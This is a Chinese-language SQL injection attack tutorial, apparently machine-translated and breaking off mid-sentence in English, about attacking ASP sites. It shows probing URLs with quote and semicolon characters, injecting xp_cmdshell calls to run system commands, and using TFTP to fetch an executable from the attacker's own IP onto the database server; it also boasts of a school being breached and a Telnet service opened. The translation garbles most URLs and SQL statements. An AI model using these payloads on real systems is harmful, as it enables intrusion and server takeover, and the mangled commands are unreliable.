SQL Injection攻击技术入侵检测(国外英语资料).doc

SQL Injection攻击技术入侵检测(国外英语资料) SQL注入攻击技术入侵检测 SQL注入可以说是一种漏洞，也可以说成是一种攻击方法，程序中的变量处理不当，对用户提交的数据过滤不足，都可能产生这个漏洞，而攻击原理就是利用用户提交或可修改的数据，把想要的SQL语句插入到系统实际SQL语句中，轻则获得敏感的信息，重则控制服务器。SQL注入并不紧紧局限在MSSQL数据库中，访问、MySQL、Oracle Sybase SQL注入攻击、都可以进行。 没有的《SQL注入攻击技术》是一篇不可多得的好文章，大家可以看看，但是程序毕竟是各种各样的，有些可以通过修改URL数据来提交命令或语句，有些则不行，不能打URL的主意，怎么办呢？通过修改输入标签内的价值的值也可以提交我们构造的语句，SQL注入是很灵活的技术，但我们的目的只有一个，就是想方设法饶过程序或IDS的检测和处理提交我们构造的有效语句。 检测漏洞 在大多数ASP站点中，我们并不知道其程序代码，靠任何扫描器也不可能发现SQL注入漏洞，这时就要靠手工检测了，由于我们执行SQL语句要用到单引号、分号、逗号、冒号和“--”，所以我们就在可修改的URL后加上以上符号，或在表单中的文本框加上这些符号，比如： HTTP：/ /本地/ show.asp？身份证1 HTTP：/ /本地/ show.asp？编号= 1； 通过页面返回的信息，判断是否存在SQL注入漏洞，只是最简单的通过字符过滤来判断，根据IIS配置不同，返回的信息是不定的，有时显示： 微软的OLE DB提供程序的ODBC驱动程序错误80040e21 ODBC驱动程序不支持所需的属性。 /登记/ lostpass2 ASP，行15。 有时可能会显示”HTTP 500内部服务器错误”，也可能显示原来的页面，也就是页面正常显示，更可能提示”HTTP 404–找不到该页”，判断是否有漏洞就要有个最基本的根据--经验，原来我刚开始学习的时候认为我们学校没有这个漏洞，但小叮当告诉我，返回的信息仅仅是个根据，更重要的是经验，结果我们学校就在2小时内被他利用SQL注入漏洞进入了，还开了一个Telnet服务 如果能拿到源代码就更好了，可以通过分析源代码来发现ASP文件的问题，不过这要求有较高的编程功底，最近pskey就发现了不少程序存在漏洞真是个厉害角色SQL注入。 提交数据 我们判断出一个ASP程序存在SQL注入漏洞以后就要构造我们的语句来对服务器进行操作了，一般我们的目的是控制SQL服务器查阅信息甚至操作系统。所以我们要用到xp_cmdshell这个扩展存储过程，xp_cmdshell是一个非常有用的扩展存储过程，用于执行系统命令，比如迪尔，我们可以根据程序的不同，提交不同的语句，下例语句仅仅是个参考，告诉大家这个原理，实际情况视程序而定，照搬不一定成功，下同。 HTTP：/ /本地/ show.asp？ID = 1；执行master.dbo.xp_cmdshell目录；—— HTTP：/ /本地/ show.asp？ID = 1；执行主.. xp_cmdshell目录—— 正如前面所说，提交这样的信息浏览器会返回出错信息或500错误，我们怎么才能知道执行是否成功呢？没有的办法是用数控监听本机端口，然后提交nslookup命令来查询，我个人觉得有些麻烦，直接用TFTP来有多种好处，能知道命令是否成功执行；能获得SQL服务器的IP从而判断SQL服务器的位置；还能节省一些步骤直接上传文件到SQL服务器。利用xp_cmdshell扩展存储过程执行TFTP命令，在玩Unicode漏洞的时候大家就炉火纯青了吧？列如： HTTP：/ /本地/ show.asp？ID = 1；执行master.dbo.xp_cmdshell的TFTP–我youip获得文件。exe”；—— HTTP：/ /本地/ show.asp？ID = 1；执行主.. xp_cmdshell的TFTP–我youip获取文件。 Exe-- Sometimes the submitted data does not necessarily work, depending on how you bypass the detection of the program, and if you are lucky, you can see the window of the TFTP software to download information from the machine. In the dialog box IP address is SQL IP server, the SQL server is in what position can be judged according